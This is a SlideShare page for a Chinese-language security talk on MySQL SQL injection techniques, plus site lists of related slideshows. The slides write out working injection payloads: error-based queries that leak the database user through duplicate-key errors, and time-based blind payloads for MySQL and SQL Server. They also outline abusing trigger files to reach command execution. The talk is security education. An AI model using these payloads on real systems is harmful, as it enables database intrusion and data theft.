SlideShare a Scribd company logo

關於SQL Injection的那些奇技淫巧

Download as PPTX, PDF
Orange Tsai
Orange Tsai
Technology
1 of 32
關於SQL Injection的那些奇技淫巧 Orange@chroot.org
SQL Injection ?
• Havij • Pangolin • DSQL tool • NBSI / HBSI • BSQL Hacker • Domain tools • SQLmap etc……
This talk is about MySQL !
MySQL Injection (Maybe you know) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
MySQL Injection (Maybe you know more.) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
MySQL Development History Feature MySQL Series 1 Unions 4.0 Subqueries 2 4.1 R-trees 4.1 (for the MyISAM storage engine) Stored procedures and functions 3 5.0 Views 5.0 Cursors 5.0 XA transactions 5.0 Triggers 4 5.0 and 5.1 Event scheduler 5.1 Partitioning 5.1 Pluggable storage engine API 5.1 Plugin API 5.1 InnoDB Plugin 5.1 Row-based replication 5.1 Server log tables 5.1
MySQL (1/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
Error Base Injection • Like Injection in SQL server • When to use ? – Insert injection – Update injection – 同樣參數在多個 table 查詢中 – Query 的資訊不會顯示在頁面中 • How to implement ? – Duplicate Error – Function Error
Select * from (Select 1,1) as x Duplicate column name '1'
Select * from (select * from user as a join user as b) as x Duplicate column name 'Host'
Select * from (select * from user as a join user as b using(Host)) as x Duplicate column name 'User'
Select * from (Select user(),user()) as x Will show user name ?
No Duplicate column name 'user()'
NAME_CONST(name ,value) Causes the column to have the given name.
Select NAME_CONST('a',1), NAME_CONST('b',2) a b 1 2
Select * from (Select NAME_CONST(user(),1), NAME_CONST(user(),1)) as x
MySQL patched it • MySQL > 5.1 – NAME_CONST() can not use again. – Argument must be const.
• select * from (select count(*),concat((select (select user()) from information_schema.tables limit 0,1), floor(rand(0)*2)) as x from information_schema.tables group by x) as a • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
What is Duplicate Entry Error?
SELECT * FROM ( SELECT COUNT( * ) , CONCAT( USER( ) , FLOOR 2 ( RAND( ) *2 ) ) FROM mysql.user GROUP BY 2 ) AS a 1 • ERROR 1062 (23000): Duplicate entry 'root@localhost1' for key 1
Demo
MySQL (2/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Trigger • Deep Blind Injection – Union Injection – Error Base Injection • I/O – Load_file – Into outfile
Deep Blind Injection • Status 200 or 500 ? • Time base quick or slow ? • a -> 0x97 – 9 -> delay 9 seconds – 7 -> delay 7 seconds • So, one char can be solved in two requests.
Deep Blind Injection DECLARE @x as int; DECLARE @w as char(6); SET @x=ASCII(SUBSTRING(master.dbo.fn_varbintohexst r(CAST({QUERY} as varbinary(8000))),{POSITION},1)); IF @x>=97 SET @x=@x-87 ELSE SET @x=@x-48; SET @w='0:0:'+CAST(@x*{SECONDS} as char); WAITFOR DELAY @w
Deep Blind Injection • if( ord(substring(hex(user()),1,1))>=97, sleep(ord(substring(hex(user()),1,1))-87), sleep(ord(substring(hex(user()),1,1))-48)) Implemented by BSQL Hacker
MySQL (3/3) • Get data • Others – Blind Injection – Information_schema • True and False – User-defined function • Time base – Triggers • Deep Blind Injection – Union Injection – Error Base Injection • Read / Write – Load_file – Into outfile
MySQL Triggers A trigger is a named database object that is associated with a table, and that activates when a particular event occurs for the table.
When a triggers created • MySQL/data/database/ – table_name.TRG – atk.TRN • When update/delete/insert will check above file. • Generate by self ?
How to Exploit it • Update / Insert data ? • Add a MySQL account ? • Exploit it with UDF ? – Cause the MySQL server stop. – Maybe a Security Feature or a Bug. • A SQL injection can run system command !
Demo
Thanks : )

Recommended

Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra滲透測試 Talk @ Nisra
滲透測試 Talk @ NisraOrange Tsai
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知Justin Lin
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 

Recommended

Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-Area網頁安全 Web security 入門 @ Study-Area
網頁安全 Web security 入門 @ Study-AreaOrange Tsai
 
滲透測試 Talk @ Nisra
滲透測試 Talk @ Nisra滲透測試 Talk @ Nisra
滲透測試 Talk @ NisraOrange Tsai
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationshipn|u - The Open Security Community
 
Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Privilege escalation from 1 to 0 Workshop
Privilege escalation from 1 to 0 Workshop Hossam .M Hamed
 
網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知網站系統安全及資料保護設計認知
網站系統安全及資料保護設計認知Justin Lin
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]Mahmoud Hatem
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrfn|u - The Open Security Community
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop Ivan Novikov
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
LISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceLISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceBrendan Gregg
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerBGA Cyber Security
 
F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection Lior Rotkovitch
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and moreBrendan Gregg
 
Streaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScaleStreaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScaleMariaDB plc
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
SSRF基礎
SSRF基礎SSRF基礎
SSRF基礎Yu Iwama
 
Solving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos AlgorithmSolving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos AlgorithmDataWorks Summit
 
MySQL Buffer Management
MySQL Buffer ManagementMySQL Buffer Management
MySQL Buffer ManagementMIJIN AN
 
InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)I Goo Lee.
 
DjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling DisqusDjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling Disquszeeg
 
[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin Charles[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin CharlesInsight Technology, Inc.
 

More Related Content

What's hot

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]Mahmoud Hatem
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)Will Schroeder
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentTeymur Kheirkhabarov
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmapMiroslav Stampar
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
LISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceLISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceBrendan Gregg
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security BoundaryWill Schroeder
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerBGA Cyber Security
 
F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection Lior Rotkovitch
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and moreBrendan Gregg
 
Streaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScaleStreaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScaleMariaDB plc
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
SSRF基礎
SSRF基礎SSRF基礎
SSRF基礎Yu Iwama
 
Solving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos AlgorithmSolving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos AlgorithmDataWorks Summit
 
MySQL Buffer Management
MySQL Buffer ManagementMySQL Buffer Management
MySQL Buffer ManagementMIJIN AN
 
InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)I Goo Lee.
 

What's hot (20)

OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]The power of linux advanced tracer [POUG18]
The power of linux advanced tracer [POUG18]
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
DNS exfiltration using sqlmap
DNS exfiltration using sqlmapDNS exfiltration using sqlmap
DNS exfiltration using sqlmap
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
LISA2019 Linux Systems Performance
LISA2019 Linux Systems PerformanceLISA2019 Linux Systems Performance
LISA2019 Linux Systems Performance
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve Öneriler
 
F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection F5 SIRT - F5 ASM WAF - DDoS protection
F5 SIRT - F5 ASM WAF - DDoS protection
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration Testers
 
BPF: Tracing and more
BPF: Tracing and moreBPF: Tracing and more
BPF: Tracing and more
 
Streaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScaleStreaming Operational Data with MariaDB MaxScale
Streaming Operational Data with MariaDB MaxScale
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
SSRF基礎
SSRF基礎SSRF基礎
SSRF基礎
 
Solving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos AlgorithmSolving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
Solving Hadoop Replication Challenges with an Active-Active Paxos Algorithm
 
MySQL Buffer Management
MySQL Buffer ManagementMySQL Buffer Management
MySQL Buffer Management
 
InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)InnoDB MVCC Architecture (by 권건우)
InnoDB MVCC Architecture (by 권건우)
 

Similar to 關於SQL Injection的那些奇技淫巧

DjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling DisqusDjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling Disquszeeg
 
[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin Charles[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin CharlesInsight Technology, Inc.
 
Collaborate 2012 - Administering MySQL for Oracle DBAs
Collaborate 2012 - Administering MySQL for Oracle DBAsCollaborate 2012 - Administering MySQL for Oracle DBAs
Collaborate 2012 - Administering MySQL for Oracle DBAsNelson Calero
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleClubHack
 
Python Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesPython Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesMats Kindahl
 
Better encryption & security with MariaDB 10.1 & MySQL 5.7
Better encryption & security with MariaDB 10.1 & MySQL 5.7Better encryption & security with MariaDB 10.1 & MySQL 5.7
Better encryption & security with MariaDB 10.1 & MySQL 5.7Colin Charles
 
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...Insight Technology, Inc.
 
Hops - Distributed metadata for Hadoop
Hops - Distributed metadata for HadoopHops - Distributed metadata for Hadoop
Hops - Distributed metadata for HadoopJim Dowling
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeFrancis Alexander
 
My sql crashcourse_intro_kdl
My sql crashcourse_intro_kdlMy sql crashcourse_intro_kdl
My sql crashcourse_intro_kdlsqlhjalp
 
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)Kyle Davis
 
MySQL Performance Tuning at COSCUP 2014
MySQL Performance Tuning at COSCUP 2014MySQL Performance Tuning at COSCUP 2014
MySQL Performance Tuning at COSCUP 2014Ryusuke Kajiyama
 
Fortify aws aurora_proxy_2019_pleu
Fortify aws aurora_proxy_2019_pleuFortify aws aurora_proxy_2019_pleu
Fortify aws aurora_proxy_2019_pleuMarco Tusa
 

Similar to 關於SQL Injection的那些奇技淫巧 (20)

DjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling DisqusDjangoCon 2010 Scaling Disqus
DjangoCon 2010 Scaling Disqus
 
[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin Charles[B14] A MySQL Replacement by Colin Charles
[B14] A MySQL Replacement by Colin Charles
 
Collaborate 2012 - Administering MySQL for Oracle DBAs
Collaborate 2012 - Administering MySQL for Oracle DBAsCollaborate 2012 - Administering MySQL for Oracle DBAs
Collaborate 2012 - Administering MySQL for Oracle DBAs
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Why MariaDB?
Why MariaDB?Why MariaDB?
Why MariaDB?
 
Fatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep KambleFatcat Automatic Web SQL Injector by Sandeep Kamble
Fatcat Automatic Web SQL Injector by Sandeep Kamble
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
 
MySQL highav Availability
MySQL highav AvailabilityMySQL highav Availability
MySQL highav Availability
 
Fudcon talk.ppt
Fudcon talk.pptFudcon talk.ppt
Fudcon talk.ppt
 
Python Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL DatabasesPython Utilities for Managing MySQL Databases
Python Utilities for Managing MySQL Databases
 
Better encryption & security with MariaDB 10.1 & MySQL 5.7
Better encryption & security with MariaDB 10.1 & MySQL 5.7Better encryption & security with MariaDB 10.1 & MySQL 5.7
Better encryption & security with MariaDB 10.1 & MySQL 5.7
 
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...
[db tech showcase Tokyo 2014] B15: Scalability with MariaDB and MaxScale by ...
 
Apache Solr for begginers
Apache Solr for begginersApache Solr for begginers
Apache Solr for begginers
 
Hops - Distributed metadata for Hadoop
Hops - Distributed metadata for HadoopHops - Distributed metadata for Hadoop
Hops - Distributed metadata for Hadoop
 
Exploiting NoSQL Like Never Before
Exploiting NoSQL Like Never BeforeExploiting NoSQL Like Never Before
Exploiting NoSQL Like Never Before
 
My sql crashcourse_intro_kdl
My sql crashcourse_intro_kdlMy sql crashcourse_intro_kdl
My sql crashcourse_intro_kdl
 
Internals of Presto Service
Internals of Presto ServiceInternals of Presto Service
Internals of Presto Service
 
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)
Probabilistic Data Structures (Edmonton Data Science Meetup, March 2018)
 
MySQL Performance Tuning at COSCUP 2014
MySQL Performance Tuning at COSCUP 2014MySQL Performance Tuning at COSCUP 2014
MySQL Performance Tuning at COSCUP 2014
 
Fortify aws aurora_proxy_2019_pleu
Fortify aws aurora_proxy_2019_pleuFortify aws aurora_proxy_2019_pleu
Fortify aws aurora_proxy_2019_pleu
 

Recently uploaded

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 

Recently uploaded (20)

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
